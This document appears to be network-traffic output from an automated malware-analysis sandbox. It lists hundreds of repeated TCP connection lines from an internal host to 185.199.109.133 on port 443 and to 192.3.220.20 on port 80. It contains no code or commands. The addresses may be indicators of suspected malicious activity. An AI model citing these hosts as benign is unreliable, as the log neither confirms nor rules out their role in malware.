Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.199.109.133:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
